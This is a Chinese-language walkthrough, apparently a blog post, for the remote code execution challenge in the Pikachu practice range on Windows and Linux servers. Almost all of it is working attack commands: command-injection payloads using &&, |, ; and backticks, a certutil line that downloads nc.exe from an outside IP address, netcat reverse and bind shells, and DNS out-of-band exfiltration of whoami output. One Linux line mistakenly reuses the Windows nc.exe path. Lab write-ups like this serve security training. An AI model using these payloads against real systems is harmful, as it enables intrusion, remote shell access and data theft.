Pikachu靶场是一个极具挑战性的网络安全练习平台,其中的远程代码执行(RCE)漏洞更是许多初学者学习和掌握的重要课题。本文将针对Pikachu靶场中的RCE漏洞,分别介绍在Windows和Linux服务器上的rce详细解决方案。
在Windows服务器上,通过ping命令执行命令时可能会出现乱码问题。针对这一问题,可以参考以下解决方案:pikachu中RCE出现乱码的解决的方案_pikachu rce乱码-CSDN博客
服务器为Windows系统的Pikachu网站
解法一:payload
127.0.0.1 && dir
127.0.0.1 & dir
127.0.0.1 | dir
127 || dir
解法二:通过上传nc来执行命令
127.0.0.1 & certutil.exe -urlcache -split -f http://43.139.186.80:80/nc.exe c://nc.exe
解法二.1:攻击者监听,网站主动连接给出shell
网站:
127.0.0.1 & c://nc.exe -e cmd 192.168.196.181 5566
攻击者:
nc -lvvp 5566
解法二.2:网站监听并给出shell,攻击者连接
网站:
127.0.0.1 & c://nc.exe -e cmd -lvvp 5566
攻击者:
nc 192.168.88.136 5566
解法三:利用dns外带平台解决无回显问题
powershell $x=whoami;$x=$x.replace('\','xxx');$y='.外连dns域名;$z=$x+$y;ping $z
去掉反斜杠的是因为结果带有“\”会导致ping命令无法执行
服务器为linux系统的pikachu网站
解法一:payload:
127.0.0.1 && dir
127.0.0.1 & dir
127.0.0.1 | dir
127 || dir
`whoami`
;whoami
解法二:利用dns外带平台解决无回显问题
`whoami`.域名
解法三:使用nc执行任意命令
解法三.1:攻击者监听,网站主动连接给出shell
网站:
127.0.0.1 & nc -e /bin/bash 192.168.196.181 5566
攻击者:
nc -lvvp 5566
解法三.2:网站监听并给出shell,攻击者连接
网站:
127.0.0.1 & c://nc.exe -e /bin/bash -lvvp 5566
攻击者:
nc 192.168.88.136 5566
总结
通过以上方法,可以有效地在Windows和Linux服务器上解决Pikachu靶场中的RCE漏洞问题。
对于初学者来说,掌握这些方法不仅能提高漏洞利用的技能,还能加深对系统命令执行原理的理解。
希望本文能对你在Pikachu靶场中的RCE漏洞挑战有所帮助。如果你有任何问题或需要进一步的帮助,请随时联系我。
